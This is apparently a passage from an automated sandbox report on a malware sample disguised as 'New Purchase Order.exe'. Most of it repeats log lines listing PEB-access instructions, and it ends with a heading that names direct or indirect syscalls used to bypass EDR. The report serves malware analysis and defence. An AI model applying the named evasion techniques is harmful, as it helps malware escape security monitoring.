                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8770 mov eax, dword ptr fs:[00000030h]8_2_016F8770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01774755 mov eax, dword ptr fs:[00000030h]8_2_01774755
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732750 mov eax, dword ptr fs:[00000030h]8_2_01732750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177E75D mov eax, dword ptr fs:[00000030h]8_2_0177E75D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172674D mov esi, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172674D mov eax, dword ptr fs:[00000030h]8_2_0172674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0750 mov eax, dword ptr fs:[00000030h]8_2_016F0750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176C730 mov eax, dword ptr fs:[00000030h]8_2_0176C730
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172273C mov ecx, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172273C mov eax, dword ptr fs:[00000030h]8_2_0172273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C720 mov eax, dword ptr fs:[00000030h]8_2_0172C720
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01720710 mov eax, dword ptr fs:[00000030h]8_2_01720710
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C700 mov eax, dword ptr fs:[00000030h]8_2_0172C700
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0710 mov eax, dword ptr fs:[00000030h]8_2_016F0710
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F47FB mov eax, dword ptr fs:[00000030h]8_2_016F47FB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177E7E1 mov eax, dword ptr fs:[00000030h]8_2_0177E7E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017127ED mov eax, dword ptr fs:[00000030h]8_2_017127ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FC7C0 mov eax, dword ptr fs:[00000030h]8_2_016FC7C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017707C3 mov eax, dword ptr fs:[00000030h]8_2_017707C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F07AF mov eax, dword ptr fs:[00000030h]8_2_016F07AF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A47A0 mov eax, dword ptr fs:[00000030h]8_2_017A47A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179678E mov eax, dword ptr fs:[00000030h]8_2_0179678E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01722674 mov eax, dword ptr fs:[00000030h]8_2_01722674
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170C640 mov eax, dword ptr fs:[00000030h]8_2_0170C640
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F262C mov eax, dword ptr fs:[00000030h]8_2_016F262C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01726620 mov eax, dword ptr fs:[00000030h]8_2_01726620
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01728620 mov eax, dword ptr fs:[00000030h]8_2_01728620
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E627 mov eax, dword ptr fs:[00000030h]8_2_0170E627
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732619 mov eax, dword ptr fs:[00000030h]8_2_01732619
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E609 mov eax, dword ptr fs:[00000030h]8_2_0176E609
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A6C7 mov eax, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017266B0 mov eax, dword ptr fs:[00000030h]8_2_017266B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C6A6 mov eax, dword ptr fs:[00000030h]8_2_0172C6A6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177C97C mov eax, dword ptr fs:[00000030h]8_2_0177C97C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173096E mov edx, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770946 mov eax, dword ptr fs:[00000030h]8_2_01770946
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4940 mov eax, dword ptr fs:[00000030h]8_2_017C4940
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0178892B mov eax, dword ptr fs:[00000030h]8_2_0178892B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177892A mov eax, dword ptr fs:[00000030h]8_2_0177892A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177C912 mov eax, dword ptr fs:[00000030h]8_2_0177C912
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]8_2_017229F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]8_2_017229F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177E9E0 mov eax, dword ptr fs:[00000030h]8_2_0177E9E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017249D0 mov eax, dword ptr fs:[00000030h]8_2_017249D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BA9D3 mov eax, dword ptr fs:[00000030h]8_2_017BA9D3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017869C0 mov eax, dword ptr fs:[00000030h]8_2_017869C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]8_2_016FA9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F09AD mov eax, dword ptr fs:[00000030h]8_2_016F09AD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F09AD mov eax, dword ptr fs:[00000030h]8_2_016F09AD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017789B3 mov esi, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017789B3 mov eax, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017789B3 mov eax, dword ptr fs:[00000030h]8_2_017789B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]8_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177E872 mov eax, dword ptr fs:[00000030h]8_2_0177E872
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177E872 mov eax, dword ptr fs:[00000030h]8_2_0177E872
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786870 mov eax, dword ptr fs:[00000030h]8_2_01786870
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786870 mov eax, dword ptr fs:[00000030h]8_2_01786870
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01720854 mov eax, dword ptr fs:[00000030h]8_2_01720854
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01702840 mov ecx, dword ptr fs:[00000030h]8_2_01702840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4859 mov eax, dword ptr fs:[00000030h]8_2_016F4859
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4859 mov eax, dword ptr fs:[00000030h]8_2_016F4859
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A830 mov eax, dword ptr fs:[00000030h]8_2_0172A830
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179483A mov eax, dword ptr fs:[00000030h]8_2_0179483A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179483A mov eax, dword ptr fs:[00000030h]8_2_0179483A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov ecx, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]8_2_01712835
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177C810 mov eax, dword ptr fs:[00000030h]8_2_0177C810
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C8F9 mov eax, dword ptr fs:[00000030h]8_2_0172C8F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C8F9 mov eax, dword ptr fs:[00000030h]8_2_0172C8F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BA8E4 mov eax, dword ptr fs:[00000030h]8_2_017BA8E4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E8C0 mov eax, dword ptr fs:[00000030h]8_2_0171E8C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C08C0 mov eax, dword ptr fs:[00000030h]8_2_017C08C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0887 mov eax, dword ptr fs:[00000030h]8_2_016F0887
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177C89D mov eax, dword ptr fs:[00000030h]8_2_0177C89D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016ECB7E mov eax, dword ptr fs:[00000030h]8_2_016ECB7E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179EB50 mov eax, dword ptr fs:[00000030h]8_2_0179EB50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C2B57 mov eax, dword ptr fs:[00000030h]8_2_017C2B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C2B57 mov eax, dword ptr fs:[00000030h]8_2_017C2B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C2B57 mov eax, dword ptr fs:[00000030h]8_2_017C2B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C2B57 mov eax, dword ptr fs:[00000030h]8_2_017C2B57
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A4B4B mov eax, dword ptr fs:[00000030h]8_2_017A4B4B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A4B4B mov eax, dword ptr fs:[00000030h]8_2_017A4B4B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786B40 mov eax, dword ptr fs:[00000030h]8_2_01786B40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786B40 mov eax, dword ptr fs:[00000030h]8_2_01786B40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BAB40 mov eax, dword ptr fs:[00000030h]8_2_017BAB40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01798B42 mov eax, dword ptr fs:[00000030h]8_2_01798B42
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8B50 mov eax, dword ptr fs:[00000030h]8_2_016E8B50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171EB20 mov eax, dword ptr fs:[00000030h]8_2_0171EB20
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171EB20 mov eax, dword ptr fs:[00000030h]8_2_0171EB20
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B8B28 mov eax, dword ptr fs:[00000030h]8_2_017B8B28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B8B28 mov eax, dword ptr fs:[00000030h]8_2_017B8B28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]8_2_0176EB1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4B00 mov eax, dword ptr fs:[00000030h]8_2_017C4B00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177CBF0 mov eax, dword ptr fs:[00000030h]8_2_0177CBF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171EBFC mov eax, dword ptr fs:[00000030h]8_2_0171EBFC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]8_2_016F8BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]8_2_016F0BCD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179EBD0 mov eax, dword ptr fs:[00000030h]8_2_0179EBD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]8_2_01710BCB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A4BB0 mov eax, dword ptr fs:[00000030h]8_2_017A4BB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A4BB0 mov eax, dword ptr fs:[00000030h]8_2_017A4BB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700BBE mov eax, dword ptr fs:[00000030h]8_2_01700BBE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700BBE mov eax, dword ptr fs:[00000030h]8_2_01700BBE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176CA72 mov eax, dword ptr fs:[00000030h]8_2_0176CA72
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176CA72 mov eax, dword ptr fs:[00000030h]8_2_0176CA72
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179EA60 mov eax, dword ptr fs:[00000030h]8_2_0179EA60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA38 mov eax, dword ptr fs:[00000030h]8_2_0172CA38
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA24 mov eax, dword ptr fs:[00000030h]8_2_0172CA24
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171EA2E mov eax, dword ptr fs:[00000030h]8_2_0171EA2E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177CA11 mov eax, dword ptr fs:[00000030h]8_2_0177CA11
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0AD0 mov eax, dword ptr fs:[00000030h]8_2_016F0AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746AA4 mov eax, dword ptr fs:[00000030h]8_2_01746AA4
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
